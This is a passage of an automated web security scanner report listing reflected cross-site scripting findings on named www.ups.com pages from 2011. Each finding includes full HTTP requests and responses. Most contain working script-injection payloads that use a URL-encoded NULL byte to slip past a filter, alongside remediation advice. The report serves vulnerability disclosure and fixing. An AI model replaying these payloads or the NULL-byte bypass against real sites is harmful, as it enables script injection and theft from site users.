Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /myWorkspace/wspref?loc=en_US%0010244'-alert(1)-'35d1037df28&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14391


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
1)-'35d1037df28';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_10244'-alert(1)-'35d1037df28';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_10244'-alert(1)-'35d1037df28';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.147. https://www.ups.com/myWorkspace/wspref [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myWorkspace/wspref

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00cd059"><script>alert(1)</script>d77ec82d71c was submitted in the loc parameter. This input was echoed as cd059"><script>alert(1)</script>d77ec82d71c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /myWorkspace/wspref?loc=en_US%00cd059"><script>alert(1)</script>d77ec82d71c&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:09 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15096


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_cd059"><script>alert(1)</script>d77ec82d71c&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_cd059%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bd77ec82d71c%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.148. https://www.ups.com/myWorkspace/wspref [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myWorkspace/wspref

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %0091f4c</script><script>alert(1)</script>899bae98079 was submitted in the loc parameter. This input was echoed as 91f4c</script><script>alert(1)</script>899bae98079 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /myWorkspace/wspref?loc=en_US%0091f4c</script><script>alert(1)</script>899bae98079&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15217


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_91f4c</script><script>alert(1)</script>899bae98079';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_91f4c</script>
...[SNIP]...

1.149. https://www.ups.com/myups/addresses [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myups/addresses

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 88949%0abe6574ffdd3 was submitted in the REST URL parameter 2. This input was echoed as 88949
be6574ffdd3
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /myups/addresses88949%0abe6574ffdd3 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44458


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/myups/addresses88949
be6574ffdd3
?appid=IMS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myups/addres
...[SNIP]...

1.150. https://www.ups.com/myups/addresses [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myups/addresses

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94431'%3b510e598237 was submitted in the REST URL parameter 2. This input was echoed as 94431';510e598237 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /myups/addresses94431'%3b510e598237 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44464


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
pid=IMS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myups/addresses94431';510e598237?appid=IMS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/myups/addresses94431';510e598237?appid=IMS';
actionUrl = "/one-to-one/l
...[SNIP]...

1.151. https://www.ups.com/myups/addresses [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myups/addresses

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5da4"%20a%3db%20f7ea2fc3fef was submitted in the REST URL parameter 2. This input was echoed as e5da4" a=b f7ea2fc3fef in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myups/addressese5da4"%20a%3db%20f7ea2fc3fef HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44559


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/myups/addressese5da4" a=b f7ea2fc3fef?appid=IMS">
...[SNIP]...

1.152. https://www.ups.com/myups/addresses [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myups/addresses

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00d4c38'-alert(1)-'57345105a30 was submitted in the loc parameter. This input was echoed as d4c38'-alert(1)-'57345105a30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /myups/addresses?loc=en_US%00d4c38'-alert(1)-'57345105a30&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14513


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
05a30&appid=IMS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_d4c38'-alert(1)-'57345105a30&appid=IMS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_d4c38'-alert(1)-'57345105a30&appid=IMS';
actionUrl = "/one-to-on
...[SNIP]...

1.153. https://www.ups.com/myups/addresses [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myups/addresses

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f1aca"><script>alert(1)</script>b1110c7fd4f was submitted in the loc parameter. This input was echoed as f1aca"><script>alert(1)</script>b1110c7fd4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /myups/addresses?loc=en_US%00f1aca"><script>alert(1)</script>b1110c7fd4f&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:09 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15218


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_f1aca"><script>alert(1)</script>b1110c7fd4f&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_f1aca%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bb1110c7fd4f%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.154. https://www.ups.com/myups/addresses [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myups/addresses

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %00ec2ae</script><script>alert(1)</script>5826b439ddd was submitted in the loc parameter. This input was echoed as ec2ae</script><script>alert(1)</script>5826b439ddd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /myups/addresses?loc=en_US%00ec2ae</script><script>alert(1)</script>5826b439ddd&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15339


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_ec2ae</script><script>alert(1)</script>5826b439ddd&appid=IMS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_ec2ae
...[SNIP]...

1.155. https://www.ups.com/myups/forgotpassword [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myups/forgotpassword

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c39c0"><script>alert(1)</script>9c8c2a16b70 was submitted in the loc parameter. This input was echoed as c39c0"><script>alert(1)</script>9c8c2a16b70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /myups/forgotpassword?loc=en_US%00c39c0"><script>alert(1)</script>9c8c2a16b70 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:03 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30759


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<script src="/assets/calendar/201001_02_00/calendar_201001_02_00_en_US_c39c0"><script>alert(1)</script>9c8c2a16b70.obf.cache.js" type="text/javascript" charset="utf-8">
...[SNIP]...

1.156. https://www.ups.com/one-to-one/forgot [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /one-to-one/forgot

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002da2b"><script>alert(1)</script>1d4bc2b1a72 was submitted in the loc parameter. This input was echoed as 2da2b"><script>alert(1)</script>1d4bc2b1a72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /one-to-one/forgot?loc=en_US%002da2b"><script>alert(1)</script>1d4bc2b1a72&WT.svl=SubNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:10 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30759


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<script src="/assets/calendar/201001_02_00/calendar_201001_02_00_en_US_2da2b"><script>alert(1)</script>1d4bc2b1a72.obf.cache.js" type="text/javascript" charset="utf-8">
...[SNIP]...

1.157. https://www.ups.com/one-to-one/register [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /one-to-one/register

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0062e6e"><script>alert(1)</script>1d53815f05 was submitted in the loc parameter. This input was echoed as 62e6e"><script>alert(1)</script>1d53815f05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /one-to-one/register?sysid=myups&lang=en&langc=US&loc=en_US%0062e6e"><script>alert(1)</script>1d53815f05 HTTP/1.1
Host: www.ups.com
Connection: keep-alive
Referer: http://www.ups.com/?Site=Corporate&cookie=us_en_home&inputImgTag=&setCookie=yes
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:17:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Keep-Alive: timeout=65
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 32223


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<script src="/assets/calendar/201001_02_00/calendar_201001_02_00_en_US_62e6e"><script>alert(1)</script>1d53815f05.obf.cache.js" type="text/javascript" charset="utf-8">
...[SNIP]...

1.158. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1c2b'%3b9f6735610f2 was submitted in the REST URL parameter 1. This input was echoed as f1c2b';9f6735610f2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /osaf1c2b'%3b9f6735610f2/orderSupplies HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40992


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
Supplies?appid=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/osaf1c2b';9f6735610f2/orderSupplies?appid=WBSO';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/osaf1c2b';9f6735610f2/orderSupplies?appid=WBSO';
actionU
...[SNIP]...

1.159. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93460"%20a%3db%2031fb5663470 was submitted in the REST URL parameter 1. This input was echoed as 93460" a=b 31fb5663470 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osa93460"%20a%3db%2031fb5663470/orderSupplies HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41087


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
